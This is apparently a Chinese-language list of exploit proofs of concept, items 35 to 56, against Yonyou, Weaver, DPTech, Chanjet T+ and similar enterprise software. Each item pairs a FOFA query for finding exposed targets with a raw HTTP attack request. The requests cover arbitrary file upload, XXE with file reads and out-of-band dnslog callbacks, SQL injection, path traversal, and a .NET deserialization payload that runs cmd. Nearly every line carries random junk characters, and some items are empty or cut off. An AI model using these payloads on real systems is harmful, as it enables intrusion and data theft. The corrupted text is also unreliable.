Accept: */*, Q3 R: Q- F) g2 Y
Connection: keep-alive
& {+ t* n0 ?, Y2 k5 g! |2 c
" b: r' m/ |7 O! O4 X$ _( a2 Z  Q
35. 用友NC-Cloud importhttpscer任意文件上传
2 b3 Q+ ^( J2 c9 O7 SFOFA:app="用友-NC-Cloud"' v) R" Q3 [  ~" b# s
POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.19 L! F3 P5 g& j/ }
Host: 203.25.218.166:88889 l' T! ]3 q4 U0 l" u0 ?6 F; C
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info) e' Y; U& I- T+ |0 F, k* j$ Z6 v
Accept-Encoding: gzip, deflate1 ]% j/ {1 `# |; u8 q* I
Accept: */*7 @: h0 R7 M- y( E" c) N4 j
Connection: close
# a) M8 d- X9 E* l) e3 }accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
) ^' z: @; `0 l5 z+ l9 YContent-Length: 190
8 I6 n5 k0 w5 aContent-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df05 v& y! k+ ~! L; y& Z$ q- G

$ x# C8 `( L8 ?: B4 `0 B--fd28cb44e829ed1c197ec3bc71748df0
8 y6 d5 y4 f/ J* U, P+ }3 b6 W. j& Z& fContent-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"
! C6 y( H3 D3 Q% j3 B$ X7 e1 r: F- M* t
<%out.println(1111*1111);%>7 O5 _2 C" }5 _
--fd28cb44e829ed1c197ec3bc71748df0--6 Y! P+ J& I! ]- l5 |9 R: g
; Z9 g3 n% e& q8 D+ w

6 X  J( e7 ^, t! X36. 用友NC-Cloud soapFormat XXE
$ J" M3 `# Q: OFOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
" w6 U% R$ R' i# pPOST /uapws/soapFormat.ajax HTTP/1.1( B8 {% |4 Z9 O" n) k7 ]
Host: 192.168.40.130:8989
% j. w: o1 p0 L: O" J; VUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0; c8 a  o) f4 t1 K. ^. a# g
Content-Length: 263
% H0 D4 c3 f6 R/ n; I( L# `Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
7 Y6 D% S4 f* I! c# JAccept-Encoding: gzip, deflate2 k* F7 {& s: M4 g" K
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
: I# \: A6 C5 @0 b* UConnection: close+ w* l: K# y8 r7 i$ {
Content-Type: application/x-www-form-urlencoded7 M# m6 G5 ?& x0 S0 e6 Z
Upgrade-Insecure-Requests: 1* [  F( f1 x: s
; }0 B# ]% n7 C1 \* [, `0 D8 d, e5 D
msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a
; |" {( k+ |( Y
9 [/ P, d" g5 H" ]2 X  [
7 z( Q1 [/ w0 e2 k$ ^$ T37. 用友NC-Cloud IUpdateService XXE. E( t$ Z) T6 q4 e* \, c$ }
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"* [- J- R; o$ D7 W6 L8 x' m* `
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1, t' S/ Y% T2 A) B3 G7 i& q
Host: 192.168.40.130:8989& n) C2 a; U" b9 y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36' ?, U8 G3 [2 J! Y0 H/ g  d  O) A
Content-Length: 421
! w: o/ D9 N. x" b: j' yAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
9 H3 F# W, N; E/ `% m: e+ l- FAccept-Encoding: gzip, deflate" g' q9 D# ~1 ?% q. `0 W: }
Accept-Language: zh-CN,zh;q=0.9
, j; W' p4 K8 x4 p: o6 M! DConnection: close2 T; @3 Z+ ^8 f5 q  L  k6 ?
Content-Type: text/xml;charset=UTF-8
# E& s) x1 z% B1 ?SOAPAction: urn:getResult# z$ Y9 R- T* K. w4 ~
Upgrade-Insecure-Requests: 1
2 P) O8 b7 X2 O) Y, c- K$ v2 N. w. y2 h' I, H
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService"># Q) C! ^4 |8 i) y* t: a! k
<soapenv:Header/>
" A& E/ S. q, H0 u<soapenv:Body>; O$ X! s0 `) d2 T
<iup:getResult>
. f. A, O0 U3 P0 V+ E<!--type: string-->5 W& i4 H( E4 H
<iup:string><![CDATA[! x) Z' _* z0 ]+ A: c, V+ l+ M6 G
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
8 j0 \& `# w+ `<xxx/>]]></iup:string>; V/ I# i9 k/ c
</iup:getResult>
* l' _6 {$ k; w- C6 e</soapenv:Body>$ |$ A" i: f/ \4 ]* {( G
</soapenv:Envelope>
- ^6 W% B- o( R# U$ m9 p7 t$ y( S& }9 h. L1 \- x
7 ]" W, J+ ~! b: f
/ Z5 D: V0 T" ]& G
38. 用友U8 Cloud smartweb2.RPC.d XXE
+ G! o3 k* O+ R1 _FOFA:app="用友-U8-Cloud"9 J" D6 j5 k0 Q3 K& _- _/ a
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
. U& J; n  [5 ~* J" V" D/ mHost: 192.168.40.131:80887 {/ a4 s4 U* g. M
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25) D% j) u& D, c- o- ^
Content-Length: 2607 Q" P- P* x( o
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
$ [  {) v! u. |Accept-Encoding: gzip, deflate2 B% y9 R7 b% F- Q8 B
Accept-Language: zh-CN,zh;q=0.9
6 B5 y& v" ~5 v" Z: }) sConnection: close
! h+ t" M! @5 ^Content-Type: application/x-www-form-urlencoded1 _$ `& ?4 C- h+ L" d0 B4 a7 n+ i

( m4 e8 M( j7 Q2 M+ N+ ___viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>
& a* ?2 b8 u! J. m: _7 O
/ `$ O$ k! a2 \" {
* [  f+ ?) B% a4 k" |; I. A$ D% `; l  s39. 用友U8 Cloud RegisterServlet SQL注入
  \. p: _3 z- I9 D9 nFOFA:title="u8c"/ h' }  {' z: f+ T: I
POST /servlet/RegisterServlet HTTP/1.1
7 {: H* S) u+ q  RHost: 192.168.86.128:8089
. w, H% H6 n6 r* f5 jUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
/ x# |# V4 M1 p$ _3 _! bConnection: close
1 r2 I5 D6 n/ r9 P+ {Content-Length: 85
3 |: T4 `/ s, x  Y! z  C: RAccept: */*. @% J8 ]  `! p" ]$ W6 v
Accept-Language: en: P3 n! I. Y# R! h$ M+ n
Content-Type: application/x-www-form-urlencoded; Q: \9 {4 C: K) \2 w9 J, `
X-Forwarded-For: 127.0.0.1& c' D7 c, g$ T- i% H' }! M
Accept-Encoding: gzip( ?' ^7 g( d0 d! g: U  z4 X6 b0 n$ l* h
4 Q' d& r4 i! W, a' ?7 E: R" s' ^# P
usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--
% |; L$ F2 Z# a! n8 w$ |' |1 y+ E# A! _* U0 }  {; _! U& a

9 @. n& G# ], N# g! |40. 用友U8-Cloud XChangeServlet XXE( W+ H. o9 T" _
FOFA:app="用友-U8-Cloud"
* U" S6 V; k, Z8 j# KPOST /service/XChangeServlet HTTP/1.1
' y# c& B: ~0 Y# Q, A( ]Host: x.x.x.x- V) U( I: D$ l+ ^
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
! |! c# s. O* ?8 @6 P/ hContent-Type: text/xml( b% L3 r. z: H+ l7 g
Connection: close$ P: S% |3 X9 F

, D+ c. u% ]% }$ l* w3 t<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>
& P$ h: @& ^9 o  a8 |
: j2 W0 m) W8 O: e) g  A5 ~
0 }+ B) [( r- G. L! [* y, @41. 用友U8 Cloud MeasureQueryByToolAction SQL注入4 f4 w2 k) O  l7 P% G* m9 p/ S# z6 n
FOFA:app="用友-U8-Cloud"
7 F9 Z! I. |1 lGET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
- o  j4 o# I4 f' D: A* fHost:3 G5 W! ?' `2 m* g! W+ X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15( k1 z5 Z. q$ D9 Z# O7 u" q
Content-Type: application/json
7 `% t- r7 z& j, X2 {Accept-Encoding: gzip! x: l4 H; ~8 l: `
Connection: close: {9 w: n0 m6 p% y- O8 d- `2 d2 q

3 b2 n6 J7 v+ n/ l2 h3 v: L* Z6 n4 a4 @, @) E  {7 E1 i
42. 用友GRP-U8 SmartUpload01 文件上传' N1 t# G4 R- e7 q
FOFA:app="用友-GRP-U8"
9 S7 _5 i2 d5 f/ e% HPOST /u8qx/SmartUpload01.jsp HTTP/1.1
& M; F3 B' ]+ e2 I7 d+ X, GHost: x.x.x.x
+ E8 }" l  P- t$ W+ w1 p8 PContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt7 j4 k( |- f' H1 w/ i
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36
% N% O2 g9 a' c
. w' |: R" ^6 }; j% b6 h2 N, sPAYLOAD
' w$ ^' b6 r7 ]3 Y3 V0 C* w- d# e! ~3 O* L" V. `

  p' Z7 @0 K1 W6 [# ~1 ehttp://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml1 s) |7 H4 Z  B, i* O5 V, [6 D
8 g. z% V4 N5 U0 ]+ p7 H
43. 用友GRP-U8 userInfoWeb SQL注入致RCE
' }1 Q5 a* U# yFOFA:app="用友-GRP-U8"3 g2 E+ b9 p# b0 D/ K
POST /services/userInfoWeb HTTP/1.1
5 P( E( p; Q; x( Y. cHost: your-ip  W- p# g/ g& d1 f3 x! j% z
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36& ^! ^% e/ s+ w& Z3 d
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7/ l5 f% l/ p* `6 J
Accept-Encoding: gzip, deflate
$ }' f8 a/ k' e0 m, N* h$ }# yAccept-Language: zh-CN,zh;q=0.94 [, A2 z1 [5 ~$ B  r
Connection: close2 L& }1 s* [* ?
SOAPAction:
* a- U. n) c* G: f8 f$ v2 ]' m) bContent-Type: text/xml;charset=UTF-8
* M2 v6 v7 b. K: G4 T. z# q
& {8 w+ B. R) X<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
6 A* Z, i9 o" U6 T   <soapenv:Header/>
2 B$ v2 _# n& |5 h8 @   <soapenv:Body>4 `6 j, C* t% c- @
      <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
% q  N2 C' E" }- `! y         <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>. h5 W4 y* @. ?7 n: x6 N9 z
      </ser:getUserNameById>
( H2 E, P9 K5 I: ^   </soapenv:Body>
6 x$ r' p2 i0 n* d</soapenv:Envelope>7 e& `* n( X0 K5 D

* `1 c; {: k* I3 b( j* u& U! R4 z% h1 R5 [7 t5 y$ ]
44. 用友GRP-U8 bx_dj_check.jsp SQL注入: y: p' Y' G7 W' T  b# x- F+ y
FOFA:app="用友-GRP-U8"
3 F. e: {+ Y% T* bGET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1
, J  u/ l- K! w8 P5 M3 KHost: your-ip
: c' G& \$ |" ~9 v9 LUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36* A  n/ S6 t& S
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.70 U5 [( k/ ]& |
Accept-Encoding: gzip, deflate
, {. \9 X% Z+ d' ~* `3 U1 XAccept-Language: zh-CN,zh;q=0.9
4 ]  r/ U. c* r2 C# [# x- uConnection: close
* {. ]4 ~  L# r/ C% r+ D6 D6 n7 ^( ~$ z& @+ r5 P

+ X0 @3 E9 ^0 Y; m9 l45. 用友GRP-U8 ufgovbank XXE
4 f- Q) f% |/ C) C6 X$ @+ eFOFA:app="用友-GRP-U8"4 ^! |' \. s8 ^7 H& L
POST /ufgovbank HTTP/1.1" h2 l. r: l0 x# K
Host: 192.168.40.130:2228 v/ D* v0 x! H/ y$ a
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0& O$ S% u4 Y' d6 W6 \
Connection: close3 T& d! ]' i% e+ Q8 h# E( m$ |2 X1 O
Content-Length: 161
& f9 p! j& X, _Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
: Y5 K8 L1 d: g6 K7 gAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+ `6 z! u7 U' HContent-Type: application/x-www-form-urlencoded
/ O0 h. F% n4 |. @" w5 c, f0 ~Accept-Encoding: gzip
: O7 E4 u  w4 D* F! C% u* G4 |4 x9 M
reqData=<?xml version="1.0"?>& h$ [8 f! s; r
<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest
7 ~2 v" E$ P1 q6 r$ \! q0 d8 k+ `  e; w
, R9 e+ Y/ ^) B  S& ]2 L/ L  N/ l* M4 Z
46. 用友GRP-U8 sqcxIndex.jsp SQL注入
5 B6 l* ?( K5 u$ B1 zFOFA:app="用友-GRP-U8"
2 E. L/ {% m; ^/ B0 ?% |GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1- D# K' Q" l. ~) d
Host: your-ip, a0 D6 w1 t7 W" s
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.365 f& E  h' e8 ^! B, c0 M" p& f2 q
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
/ R1 z2 @, b* ^& |/ dAccept-Encoding: gzip, deflate
! q( Q- {" E' h( X) X6 E& _' QAccept-Language: zh-CN,zh;q=0.97 [) T  O" I2 t1 ?: t
Connection: close, t( J  E7 }4 h, P  ~
6 M- I, j% F8 J7 f6 W7 Y$ P0 t  W
5 a* f. C- E. j! D
47. 用友GRP A++Cloud 政府财务云 任意文件读取
! B1 u2 k4 f# M$ j; X& |, SFOFA:body="/pf/portal/login/css/fonts/style.css"1 K5 c$ x% Y- ~' F
GET /ma/emp/maEmp/download?fileName=../../../etc/passwdHTTP/1.1
, a6 z: v) Y: D$ sHost: x.x.x.x
8 `9 W7 d5 ~+ l# mCache-Control: max-age=01 N# c2 @2 O0 a
Upgrade-Insecure-Requests: 1
. }6 p: P3 B$ S: s. S: x) CUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36. [* L" d2 B8 V1 ^& L* |% S$ P
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
0 w: o6 g  ?# Y' c# }4 xAccept-Encoding: gzip, deflate, br
6 t, g6 ~$ i8 O! v7 I& t) `Accept-Language: zh-CN,zh;q=0.9
" Z6 i1 ^4 G; I  o: Q, W, cIf-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT1 y. O: v1 N; L2 d$ N0 v6 Z1 B
Connection: close
8 X! I# F3 g8 E4 L) J4 U& [2 m+ l0 C
; l1 h0 f$ R6 Y3 C: d5 s3 r' r) H4 X8 m
1 ^- ~1 c, ~6 x; }: m, e) X
48. 用友U8 CRM swfupload 任意文件上传+ U% l( K/ Z' I# S
FOFA:title="用友U8CRM"
/ g0 G# w) Y9 \: A( z5 oPOST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
/ {. ~3 X+ m! o2 H4 ^) yHost: your-ip2 w" T5 `4 ?& q4 Y4 S
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
9 L7 C) ~6 L0 DAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8! ]1 ?$ x* V$ R5 X& i* ?$ g0 W
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.20 @& o0 |, i, [* @' P4 c3 z, m
Accept-Encoding: gzip, deflate, R& F# ?' u2 w5 r' W& ?
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855
& |+ Z: ~& o# I5 O- [% o------2695209672394068716424300668559 a) K4 n( m- @- |3 J$ N# [
Content-Disposition: form-data; name="file"; filename="s.php"8 {' a  @$ R" P. \/ v8 r" s
1231
" n% u- l; V1 YContent-Type: application/octet-stream
8 T) Y, R  t3 A4 \; [+ }2 A" R------2695209672394068716424300668551 g7 |: e9 C5 p9 L& S/ a, t
Content-Disposition: form-data; name="upload"' i" j: ^$ R6 d
upload0 R, f! r# e! ^- Q
------269520967239406871642430066855--
9 O5 o3 r2 j5 I  T# f4 S& i
+ W$ ?2 A4 b6 S
. E8 I# B4 s* @  ?9 y49. 用友U8 CRM系统uploadfile.php接口任意文件上传, r# w) h: B  h2 Q4 T
FOFA:body="用友U8CRM"% e% @2 o3 @. T+ _

+ {" p% ?: M1 P0 E" q) yPOST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1! l3 Z" _( r: L* f  \* H* }
Host: x.x.x.x. v7 b% N$ F7 X+ O' M* p
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
' }4 I& D9 r$ v* O3 |# K* fContent-Length: 3293 Y! B: W2 P& z& a1 ~3 C; |
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' o* P3 ]7 I  i2 Y1 F$ J. x
Accept-Encoding: gzip, deflate
  X2 k8 K  m- M. I3 u' ]Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2% y  \' U. ~5 M! m3 H
Connection: close4 m8 `+ s' m# W8 @
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w
8 m6 O) i3 c5 L9 W
& N8 g7 p+ W1 `. F' ?, {3 R& @-----------------------------vvv3wdayqv3yppdxvn3w2 _$ c0 ]$ K/ x$ B5 T" p% @7 H
Content-Disposition: form-data; name="file"; filename="%s.php "# p* V0 n2 E% y% b
Content-Type: application/octet-stream
8 {1 `# Y/ |; [( f
+ k& C8 t. D, |9 bwersqqmlumloqa
9 S  d" L3 l  H3 b% k  ?9 g-----------------------------vvv3wdayqv3yppdxvn3w6 Z+ z) l+ t) t% d: s5 E
Content-Disposition: form-data; name="upload"
% {1 J7 n% J  g; F
( m2 T: b* M2 W1 @2 L2 Cupload
, A4 O. `  n: j-----------------------------vvv3wdayqv3yppdxvn3w--9 q4 O: h: ?0 z" B  F
* A/ o) [4 b  X8 |4 A
3 a8 O8 D3 A, ~
http://x.x.x.x/tmpfile/updB3CB.tmp.php4 ~+ |% D( o# @0 e+ a, T9 _1 J- F
* B/ u( s3 }1 e/ A0 Q# P$ z
50. QDocs Smart School 6.4.1 filterRecords SQL注入
4 t' _8 v+ G0 r& I% |% {FOFA:body="close closebtnmodal"
6 p$ I* E& Q$ q- F- DPOST /course/filterRecords/ HTTP/1.1
# e) r( [2 C5 oHost: x.x.x.x
/ G' p$ K9 t5 h7 @$ QUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36* H3 X. X' J  {( O( w. C
Connection: close" J' g/ k3 F9 P9 ?
Content-Length: 2249 l7 ~6 E- H. J4 Y
Accept: */*7 X  ~, N4 u9 Z# n
Accept-Language: en. ~# M9 Z# d. N4 @* z, t
Content-Type: application/x-www-form-urlencoded* e" m; N1 M0 W! V
Accept-Encoding: gzip0 C5 r5 j# A& k! ^7 d
& B' z5 L3 u3 T# Q- _
searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1
$ N5 U- y/ r7 B; K# p  o+ X/ {& n, {0 b- e$ V9 _

* `3 H4 q% B9 M+ z51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入9 X( Q9 v% q. J9 i5 V; d( w
FOFA:app="云时空社会化商业ERP系统"  h: v. p4 z! b8 M6 C6 V
GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1" u% t& p& R# V. z5 }! k, K+ J
Host: your-ip
. Q% }1 Z1 R7 s2 N6 y& b/ Q  gUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36; `$ ]1 V' R% v, ?7 V' [  Q
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9% n0 j9 x6 l& @$ X+ i; ^; M. s
Accept-Encoding: gzip, deflate3 e9 B" k# R* ], B( b% Y
Accept-Language: zh-CN,zh;q=0.96 r0 Q7 X% ?: h9 ]2 B
Connection: close: K$ D0 |! z; V) {; r) W5 Z8 A4 A

# X3 v9 u  z) ^0 I( k* B! m/ Z7 l- x1 p- D* [  v3 A$ a
52. 泛微E-Office json_common.php sql注入$ H4 _7 s, h' T& i3 f0 |
FOFA:app="泛微-EOffice"# o, _1 b: `7 Q: V4 u2 n
POST /building/json_common.php HTTP/1.1
' s) R$ S2 u( P$ FHost: 192.168.86.128:8097
4 N& N" \- Q2 Y; D# SUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
, a( t) p$ ?: lConnection: close2 j" ^  Y) A; j+ ~& O
Content-Length: 87
% d# K. w& B) ^  g! [7 M3 S% {Accept: */*
5 i8 u" ^: V0 ?Accept-Language: en
/ {8 x  k2 l0 T& Z* X% vContent-Type: application/x-www-form-urlencoded. y7 V0 Y! k6 X$ M4 S; Y% t9 I
Accept-Encoding: gzip4 _& C2 \0 k4 Y7 O8 R$ Y; Z

0 Z, E6 z6 [0 ztfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333
9 ?4 S7 |# H  q6 V: H( Y
- g0 n) ^9 E2 @+ ?( q! F6 J
' v) D% r* c$ z* n6 }53. 迪普 DPTech VPN Service 任意文件上传2 ~6 E  h) d8 g( J- _1 c
FOFA:app="DPtech-SSLVPN"
, \* i% D& Q7 ?5 M/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd, E9 ^0 u. _! U% L9 A9 Q

" B( w9 x* C/ o1 h, u- K# j, U) `5 h
4 ]+ s( ~& D; t54. 畅捷通T+ getstorewarehousebystore 远程代码执行
8 U8 J* o! J! A3 _4 |FOFA:app="畅捷通-TPlus"
: K% ?2 \7 M, J- r第一步,向目标发送数据包,执行命令,将指定字符串写入指定文件- c+ h$ j6 S$ m% Q) n& J4 e
"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
: m& w& S7 z% ?) R# A( p+ F
# I3 a: j$ F! K5 E6 G
; S& G) r" z8 e9 b: a$ M/ X完整数据包/ @7 Y* ?" S8 R# F
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
. E1 Q$ \& `5 D" FHost: x.x.x.x
- d) u: y1 P1 I$ r9 c  jUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
$ E! Y! B& s4 N, [, o% p/ tContent-Length: 5933 [4 K8 H! }* M7 J- F$ E
% f( W& N- z  G; r$ R
{
; j# S. J; T4 T1 Q"storeID":{
% c0 o3 U2 R# v2 b' ]# K! y5 R "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
2 Q/ O0 M0 K5 c! P9 _6 j* W "MethodName":"Start",
% [$ X! b7 M+ Y( Z5 Z. U  "ObjectInstance":{$ b' U  w7 V. U- i. }
   "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",$ L. ?5 q1 Y, y: ~
    "StartInfo":{
# b+ D+ h4 ^, O6 r3 W3 R* F+ x) n   "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",8 r& z8 \5 B5 _4 `7 a% @
    "FileName":"cmd",
7 I3 }8 \7 v* J9 m    "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"; \- |7 w' |) X, A8 r4 L2 @
    }! t  K; a! }3 J$ [5 a" m7 V
  }" C; ?% S) ]9 z- B9 [2 H9 H6 d& O, P- t
  }
! S) G5 e0 W* m; e" @}3 L: \* W4 ~8 M: O$ o
8 |2 u! S! v' o" q1 |
. Q+ T# Q# I2 c6 _
第二步,访问如下url
9 H5 ?5 t. ~9 ]! B; u! v1 M/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt
* E1 @  z. A5 z5 j3 e" g
9 |0 _2 \+ g: \
" i) s6 [7 k+ u' d1 {55. 畅捷通T+ getdecallusers信息泄露
. f0 y7 T0 ?# ?6 ^$ X5 W; \FOFA:app="畅捷通-TPlus"4 z( [+ e! H- C4 I) y1 y" H
第一步,通过" ?# f4 b2 F, E) k
/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword接口获取Cookie
% k( G$ B, S; t* P6 V' ^第二步,利用获取到的Cookie请求
/ H- ]  T0 ], k& Q# N/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers
7 W% S& Y) S0 k6 x* M0 y
) F# _! x+ i# h' ]56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE
' j$ d' X/ l8 v% T) C7 p. }" s. O4 CFOFA: app="畅捷通-TPlus"& ?0 b% t: Z" {* I3 [3 S* M
